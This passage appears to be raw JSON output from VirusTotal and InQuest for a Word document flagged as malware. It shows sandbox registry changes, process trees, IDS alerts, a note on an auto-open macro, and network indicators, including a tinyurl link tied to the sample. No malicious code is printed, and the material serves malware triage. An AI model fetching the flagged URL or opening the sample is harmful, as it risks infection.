"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{cac88484-7515-4c03-82e6-71a87abac361}\\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\\#\\SymbolicLink"
},
{
"value":"0",
"key":"HKLM\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refresh"
},
{
"value":"1",
"key":"HKLM\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed"
},
{
"value":"28 1B 00 00 01 00 00 00 00 00 00 00 10 00 00 00 18 1B 00 00 09 00 00 00 9A 00 00 00 01 00 00 00 01 00 00 00 40 00 00 00 1A 00 00 00 5C 00 5C 00 2E 00 5C 00 72 00 6F 00 6F 00 74 00 5C 00 77 00 6D 00 69 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 01 00 00 04 00 00 00 08 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 64 00 00 00 68 00 00 00 3A 00 00 00 4D 00 53 00 69 00 53 00 43 00 53 00 49 00 5F 00 43 00 6F 00 6E 00 6E 00 65 00 63 00 74 00 69 00 6F 00 6E 00 53 00 74 00 61 00 74 00 69 00 73 00 74 00 69 00 63 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 1A 00 00 00 49 00 6E 00 73 00 74 00 61 00 6E 00 63 00 65 00 4E 00 61 00 6D 00 65 00 00 00 2F 20 4D 6F 64 75 6C 65 20 4E 61 6D 65 3A 48 00 00 00 00 00 00 00 02 00 00 00 15 00 00 00 00 00 00 00 64 00 00 00 00 05 41 10 48 00 00 00 1C 00 00 00 42 00 79 00 74 00 65 00 73 00 52 00 65 00 63 00 65 00 69 00 76 00 65 00 64 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 15 00 00 00 00 00 00 00 64 00 00 00 00 05 41 10 40 00 00 00 14 00 00 00 42 0",
"key":"HKLM\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Data"
},
{
"value":"LowDateTime:418629328,HighDateTime:30487037***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\System32\\Drivers\\portcls.SYS[PortclsMof]"
},
{
"value":"LowDateTime:-227274444,HighDateTime:30116024***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\HDAudBus.sys[HDAudioMofName]"
},
{
"value":"LowDateTime:1137199616,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\System32\\Drivers\\en-US\\portcls.SYS.mui[PortclsMof]"
},
{
"value":"LowDateTime:1497199616,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\en-US\\mssmbios.sys.mui[MofResource]"
},
{
"value":"LowDateTime:302488720,HighDateTime:30778805***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\advapi32.dll[MofResourceName]"
},
{
"value":"LowDateTime:369951187,HighDateTime:30778805***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\en-US\\advapi32.dll.mui[MofResourceName]"
},
{
"value":"LowDateTime:1237199616,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\en-US\\ACPI.sys.mui[ACPIMOFResource]"
},
{
"value":"LowDateTime:-377767680,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\en-US\\HDAudBus.sys.mui[HDAudioMofName]"
},
{
"value":"LowDateTime:382232320,HighDateTime:30016580***Binary mof failed, see WMIPROV.LOG",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\drivers\\en-US\\ndis.sys.mui[MofResourceName]"
},
{
"value":"LowDateTime:-577767680,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\en-US\\intelppm.sys.mui[PROCESSORWMI]"
},
{
"value":"LowDateTime:803713417,HighDateTime:0***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\IDE\\DiskAMDX_HARDDISK___________________________2.5+____\\5&2770a7af&0&0.0.0_0-{05901221-D566-11d1-B2F0-00A0C9062910}"
},
{
"value":"LowDateTime:-445445610,HighDateTime:30778799***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\intelppm.sys[PROCESSORWMI]"
},
{
"value":"LowDateTime:398767260,HighDateTime:30646967***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\ACPI.sys[ACPIMOFResource]"
},
{
"value":"LowDateTime:-1637837527,HighDateTime:30762899***Binary mof failed, see WMIPROV.LOG",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\monitor.sys[MonitorWMI]"
},
{
"value":"LowDateTime:-649833737,HighDateTime:30733938***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\mssmbios.sys[MofResource]"
},
{
"value":"1354301477",
"key":"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00004109110000000000000000F01FEC\\Usage\\WORDFiles"
},
{
"value":"1354301536",
"key":"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00004109110000000000000000F01FEC\\Usage\\ProductFiles"
},
{
"value":"1354301450",
"key":"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00004109E60090400000000000F01FEC\\Usage\\ProductNonBootFilesIntl_1033"
},
{
"value":"01 01 00 00 00 00 00 00 00 00 06 00 00 00",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Common\\Toolbars\\Settings\\Microsoft Word"
},
{
"value":"12642",
"key":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Counter"
},
{
"value":"12643",
"key":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Help"
},
{
"key":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating"
},
{
"value":"SW\\{eeab7790-c514-11d1-b42b-00805fc1270e}\\asyncmac",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{ad498944-762f-11d0-8dcb-00c04fc3358c}\\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\\DeviceInstance"
},
{
"value":"1",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{cac88484-7515-4c03-82e6-71a87abac361}\\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\\Control\\ReferenceCount"
},
{
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\22\\(Default)"
},
{
"value":"00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\24\\ffffffffffffffffffffffffffffff00"
},
{
"value":"00 00 00 00 71 00 00 00 19 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\24\\ffffffffffffffffffffffffffffff01"
},
{
"value":"01 00 00 00 5A 00 00 00 D6 17 00 00 FF FF FF FF FF FF FF FF FF FF FF FF",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\24\\ffffffffffffffffffffffffffffff02"
},
{
"value":"00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\24\\ffffffffffffffffffffffffffffff03"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\ndis.sys[MofResourceName]",
"value":"LowDateTime:-1971493113,HighDateTime:30676308***Binary mof failed, see WMIPROV.LOG"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\System32\\Drivers\\portcls.SYS[PortclsMof]",
"value":"LowDateTime:-1221632304,HighDateTime:30487028***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\en-US\\ACPI.sys.mui[ACPIMOFResource]",
"value":"LowDateTime:-403062016,HighDateTime:30016570***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\HDAudBus.sys[HDAudioMofName]",
"value":"LowDateTime:-1867536076,HighDateTime:30116016***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\System32\\Drivers\\en-US\\portcls.SYS.mui[PortclsMof]",
"value":"LowDateTime:-503062016,HighDateTime:30016570***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\advapi32.dll[MofResourceName]",
"value":"LowDateTime:-1337772912,HighDateTime:30778796***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\en-US\\advapi32.dll.mui[MofResourceName]",
"value":"LowDateTime:-1270310445,HighDateTime:30778796***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\en-US\\mssmbios.sys.mui[MofResource]",
"value":"LowDateTime:-143062016,HighDateTime:30016570***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\en-US\\HDAudBus.sys.mui[HDAudioMofName]",
"value":"LowDateTime:-2018029312,HighDateTime:30016571***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\en-US\\ndis.sys.mui[MofResourceName]",
"value":"LowDateTime:-1258029312,HighDateTime:30016571***Binary mof failed, see WMIPROV.LOG"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\en-US\\intelppm.sys.mui[PROCESSORWMI]",
"value":"LowDateTime:2076937984,HighDateTime:30016571***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\intelppm.sys[PROCESSORWMI]",
"value":"LowDateTime:-2085707242,HighDateTime:30778791***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\ACPI.sys[ACPIMOFResource]",
"value":"LowDateTime:-1241494372,HighDateTime:30646958***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\monitor.sys[MonitorWMI]",
"value":"LowDateTime:1016868137,HighDateTime:30762891***Binary mof failed, see WMIPROV.LOG"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\mssmbios.sys[MofResource]",
"value":"LowDateTime:2004871927,HighDateTime:30733930***Binary mof compiled successfully"
},
{
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\Trusted Documents\\LastPurgeTime",
"value":"26791636"
},
{
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\Data\\Toolbars",
"value":"4C 00 00 00 A3 01 00 00 01 00 00 00 02 01 FF FF BD 00 00 00 00 00 00 00 00 00 10 00 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 01 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 1B 00 00 00 01 00 E2 71"
},
{
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\TimeZoneInformation\\ActiveTimeBias",
"value":"4294967176"
},
{
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_LOG",
"value":"%windir%\\System32\\Bits.log"
},
{
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_BAK",
"value":"%windir%\\System32\\Bits.bak"
},
{
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\MTTT",
"value":"34 06 00 00 A0 C2 86 8C 98 32 D6 01 00 00 00 00 80 0A 00 00 E0 A7 FF B1 98 32 D6 01 00 00 00 00"
},
{
"key":"HKLM\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Data",
"value":"28 1B 00 00 01 00 00 00 00 00 00 00 10 00 00 00 18 1B 00 00 09 00 00 00 9A 00 00 00 01 00 00 00 01 00 00 00 40 00 00 00 1A 00 00 00 5C 00 5C 00 2E 00 5C 00 72 00 6F 00 6F 00 74 00 5C 00 77 00 6D 00 69 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 01 00 00 04 00 00 00 08 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 64 00 00 00 68 00 00 00 3A 00 00 00 4D 00 53 00 69 00 53 00 43 00 53 00 49 00 5F 00 43 00 6F 00 6E 00 6E 00 65 00 63 00 74 00 69 00 6F 00 6E 00 53 00 74 00 61 00 74 00 69 00 73 00 74 00 69 00 63 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 1A 00 00 00 49 00 6E 00 73 00 74 00 61 00 6E 00 63 00 65 00 4E 00 61 00 6D 00 65 00 00 00 2F 20 4D 6F 64 75 6C 65 20 4E 61 6D 65 3A 48 00 00 00 00 00 00 00 02 00 00 00 15 00 00 00 00 00 00 00 64 00 00 00 00 05 41 10 48 00 00 00 1C 00 00 00 42 00 79 00 74 00 65 00 73 00 52 00 65 00 63 00 65 00 69 00 76 00 65 00 64 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 15 00 00 00 00 00 00 00 64 00 00 00 00 05 41 10 40 00 00 00 14 00 00 00 42 0 .. truncated"
},
{
"key":"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00004109E60090400000000000F01FEC\\Usage\\ProductNonBootFilesIntl_1033",
"value":"1367932938"
},
{
"key":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS\\StateIndex",
"value":"1"
},
{
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\24\\ffffffffffffffffffffffffffffff01",
"value":"00 00 00 00 6D 00 00 00 19 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF"
}
],
"has_pcap":false,
"processes_tree":[
{
"process_id":"2936",
"name":"%windir%\\system32\\wbem\\wmiprvse.exe"
},
{
"process_id":"2900",
"name":"wmiadap.exe /F /T /R"
},
{
"process_id":"2644",
"name":"\"%ProgramFiles(x86)%\\Microsoft Office\\Office14\\WINWORD.EXE\" %SAMPLEPATH%"
},
{
"process_id":"2256",
"name":"%windir%\\System32\\svchost.exe -k WerSvcGroup"
}
],
"analysis_date":1607472788,
"processes_terminated":[
"wmiadap.exe /F /T /R",
"%windir%\\System32\\svchost.exe -k WerSvcGroup"
],
"has_html_report":false,
"registry_keys_deleted":[
"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\First Counter",
"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\Last Counter",
"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\First Help",
"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\Last Help",
"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\Object List"
],
"behash":"fd7358c7e7f4d2d645756a08e2f519ec",
"last_modification_date":1607584657,
"sandbox_name":"C2AE"
},
"type":"file_behaviour",
"id":"e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c_C2AE",
"links":{
"self":"https://www.virustotal.com/api/v3/file_behaviours/e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c_C2AE"
}
},
{
"attributes":{
"verdicts":[
"MALWARE"
],
"ip_traffic":[
{
"destination_ip":"224.0.0.22"
},
{
"transport_layer_protocol":"UDP",
"destination_ip":"224.0.0.252",
"destination_port":5355
}
],
"files_written":[
"C:\\Users\\user\\AppData\\Local\\Temp\\b5514e47d2abe363e158aa892fa0dbe4.docx",
"C:\\Users\\user\\AppData\\Local\\Temp\\~$514e47d2abe363e158aa892fa0dbe4.docx"
],
"modules_loaded":[
"UxTheme",
"OLEAUT32",
"ole32",
"msctf",
"IMM32",
"api-ms-win-downlevel-advapi32-l2-1-0",
"ADVAPI32",
"usp10",
"dwrite",
"SXS",
"MSCTF"
],
"has_pcap":true,
"analysis_date":1607514315,
"sandbox_name":"Yomi Hunter",
"has_html_report":true,
"behash":"30c9e987f1b060915e2d4a531489b650",
"last_modification_date":1607541972,
"ids_alerts":[
{
"rule_category":"Potentially Bad Traffic",
"alert_severity":"medium",
"alert_context":{
"src_ip":"10.10.0.121",
"dest_ip":"224.0.0.22"
},
"rule_msg":"DECODE_IP_OPTION_SET",
"rule_source":"snort",
"rule_id":"444"
},
{
"rule_category":"Attempted Information Leak",
"alert_severity":"medium",
"alert_context":{
"src_ip":"10.10.0.121",
"protocol":"UDP",
"dest_ip":"224.0.0.252",
"src_port":51706,
"dest_port":5355
},
"rule_msg":"PSNG_UDP_PORTSWEEP_FILTERED",
"rule_source":"snort",
"rule_id":"23"
}
],
"processes_created":[
"C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding",
"C:\\Program Files (x86)\\Microsoft Office\\Office12\\WINWORD.EXE /Automation -Embedding",
"C:\\Windows\\splwow64.exe 12288",
"bin\\is32bit.exe -f C:\\Program Files (x86)\\Microsoft Office\\Office15\\WINWORD.EXE",
"bin\\GLIHZOHpN.exe --app C:\\Program Files (x86)\\Microsoft Office\\Office15\\WINWORD.EXE --only-start --args C:\\Users\\A4148~1.MON\\AppData\\Local\\Temp\\b5514e47d2abe363e158aa892fa0dbe4.docx /e --curdir C:\\Users\\A4148~1.MON\\AppData\\Local\\Temp",
"C:\\Program Files (x86)\\Microsoft Office\\Office15\\WINWORD.EXE C:\\Users\\A4148~1.MON\\AppData\\Local\\Temp\\b5514e47d2abe363e158aa892fa0dbe4.docx /e",
"bin\\is32bit.exe -p 1884"
],
"processes_tree":[
{
"process_id":"1884",
"time_offset":24909,
"name":"63ca65483996721f7e5de56cb5036d32.EXE"
}
],
"files_opened":[
"C:\\",
"C:\\Users\\",
"C:\\Users\\user\\",
"C:\\Users\\user\\AppData\\",
"C:\\Users\\user\\AppData\\Local\\",
"C:\\Users\\user\\AppData\\Local\\Temp\\b5514e47d2abe363e158aa892fa0dbe4.docx",
"C:\\Users\\user\\AppData\\Local\\Temp\\~$514e47d2abe363e158aa892fa0dbe4.docx",
"C:\\Windows\\Fonts\\staticcache.dat"
]
},
"type":"file_behaviour",
"id":"e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c_Yomi Hunter",
"links":{
"self":"https://www.virustotal.com/api/v3/file_behaviours/e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c_Yomi Hunter"
}
}
],
"links":{
"self":"https://www.virustotal.com/api/v3/files/e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c/behaviours?limit=10"
}
}
VirusTotal_v3_comments.py
{
"meta":{
"count":2
},
"data":[
{
"attributes":{
"date":1607511498,
"text":"Joe Sandbox Analysis: \n\t\t\t\nVerdict: MAL\nScore: 48/100\nClassification: mal48.winDOCX@1/3@0/0\n\nHTML Report: https://www.joesandbox.com/analysis/328528/0/html\t\nPDF Report: https://www.joesandbox.com/analysis/328528/0/pdf\nExecutive Report: https://www.joesandbox.com/analysis/328528/0/executive\nIncident Report: https://www.joesandbox.com/analysis/328528/0/irxml\nIOCs: https://www.joesandbox.com/analysis/328528?idtype=analysisid\n\t",
"votes":{
"positive":0,
"abuse":0,
"negative":0
},
"html":"Joe Sandbox Analysis: <br />\t\t\t<br />Verdict: MAL<br />Score: 48/100<br />Classification: mal48.winDOCX@1/3@0/0<br /><br />HTML Report: https://www.joesandbox.com/analysis/328528/0/html\t<br />PDF Report: https://www.joesandbox.com/analysis/328528/0/pdf<br />Executive Report: https://www.joesandbox.com/analysis/328528/0/executive<br />Incident Report: https://www.joesandbox.com/analysis/328528/0/irxml<br />IOCs: https://www.joesandbox.com/analysis/328528?idtype=analysisid<br />\t",
"tags":[
]
},
"type":"comment",
"id":"f-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c-5904096f",
"links":{
"self":"https://www.virustotal.com/api/v3/comments/f-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c-5904096f"
}
},
{
"attributes":{
"date":1607471419,
"text":"Extruded layers such as embedded logic (2426 bytes), semantic context (21 bytes) (including OCR: 0 bytes), and metadata (0 bytes) are available for view and pivot on InQuest Labs.\n\nhttps://labs.inquest.net/dfi/hash/e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c\n\n\n\n\n[info] Macro with Startup Hook: Detected macro logic that will automatically execute on document open. Most malware contains some execution hook.\n\nInterface with InQuest Labs via API through this Python library/CLI: https://github.com/inquest/python-inquestlabs",
"votes":{
"positive":0,
"abuse":0,
"negative":0
},
"html":"Extruded layers such as embedded logic (2426 bytes), semantic context (21 bytes) (including OCR: 0 bytes), and metadata (0 bytes) are available for view and pivot on InQuest Labs.<br /><br />https://labs.inquest.net/dfi/hash/e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c<br /><br />[info] Macro with Startup Hook: Detected macro logic that will automatically execute on document open. Most malware contains some execution hook.<br /><br />Interface with InQuest Labs via API through this Python library/CLI: https://github.com/inquest/python-inquestlabs",
"tags":[
]
},
"type":"comment",
"id":"f-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c-3fb2315e",
"links":{
"self":"https://www.virustotal.com/api/v3/comments/f-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c-3fb2315e"
}
}
],
"links":{
"self":"https://www.virustotal.com/api/v3/files/e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c/comments?limit=10"
}
}
VirusTotal_v3_comments.py
{
"analysis":{
"hash":"e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"metadata":{
"tlp":"WHITE"
},
"plugins":{
"avast":{
"results":{
"detection":"Other:Malware-gen\\ [Trj]",
"alerts":[
"Malware infection"
]
}
},
"clamav":{
"results":{
}
},
"metaextract":{
"results":{
}
},
"msdefender":{
"results":{
"detection":"TEL:AGGR:SuspiciousCasingAutoOpen",
"alerts":[
"Malware infection"
]
}
},
"ratdecoder":{
"results":null
},
"yarad":{
"results":{
"detection":[
]
}
},
"cuckoo":{
"result":{
"info":{
"duration":87,
"score":3.2
},
"signatures":[
{
"families":[
],
"description":"HTTP traffic contains suspicious features which may be indicative of malware related traffic",
"severity":2,
"ttp":{
},
"markcount":3,
"references":[
],
"marks":[
{
"suspicious_features":"POST method with no referer header",
"type":"generic",
"suspicious_request":"POST https://nexus.officeapps.live.com/nexus/upload/%7b20E311A8-411A-4C4D-A632-7744661495A1%7d"
},
{
"suspicious_features":"POST method with no referer header",
"type":"generic",
"suspicious_request":"POST https://nexus.officeapps.live.com/nexus/upload/%7bDAB34A62-E36C-4388-9234-517A78D7E0BA%7d"
},
{
"suspicious_features":"POST method with no referer header",
"type":"generic",
"suspicious_request":"POST https://nexus.officeapps.live.com/nexus/upload/%7bEB8A3342-F3D2-4728-96D4-488F6220D276%7d"
}
],
"name":"network_cnc_http"
},
{
"families":[
],
"description":"Performs some HTTP requests",
"severity":2,
"ttp":{
},
"markcount":14,
"references":[
],
"marks":[
{
"category":"request",
"ioc":"GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEALYmhVz87O42hRbWDiYKQc%3D",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTlMusCQK2hbCidwnVINVIaWKpcFQQUGKka%2FLJFScFvMDQIK9mHnLAlV3oCEA5ASQxVMtLx%2F7bSyRc4Qqo%3D",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEGfe9D7xe9riT%2FWUBgbSwIQ%3D",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET http://ocsp.comodoca4.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE%3D",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET http://ocsp.comodoca4.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQAU7Bfe6xSRj1%2Bo83zCN%2BY2wTgIAQU1LD0%2FU%2BcQqRs3D0u7ltBGMmtA%2FYCEQCGAJT1BA7oz3fngde5x7hq",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET http://crl.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crl",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4266&crev=3",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4266.1001&ClientId=%7b54C7745C-E82A-4B14-AF84-02BBDE98E04D%7d&",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET https://tinyurl.com/y54lptvl",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"POST https://nexus.officeapps.live.com/nexus/upload/%7b20E311A8-411A-4C4D-A632-7744661495A1%7d",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"POST https://nexus.officeapps.live.com/nexus/upload/%7bDAB34A62-E36C-4388-9234-517A78D7E0BA%7d",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"POST https://nexus.officeapps.live.com/nexus/upload/%7bEB8A3342-F3D2-4728-96D4-488F6220D276%7d",
"type":"ioc",
"description":null
}
],
"name":"network_http"
},
{
"families":[
],
"description":"Sends data using the HTTP POST Method",
"severity":2,
"ttp":{
},
"markcount":3,
"references":[
],
"marks":[
{
"category":"request",
"ioc":"POST https://nexus.officeapps.live.com/nexus/upload/%7b20E311A8-411A-4C4D-A632-7744661495A1%7d",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"POST https://nexus.officeapps.live.com/nexus/upload/%7bDAB34A62-E36C-4388-9234-517A78D7E0BA%7d",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"POST https://nexus.officeapps.live.com/nexus/upload/%7bEB8A3342-F3D2-4728-96D4-488F6220D276%7d",
"type":"ioc",
"description":null
}
],
"name":"network_http_post"
},
{
"families":[
],
"description":"Allocates read-write-execute memory (usually to unpack itself)",
"severity":2,
"ttp":{
},
"markcount":23,
"references":[
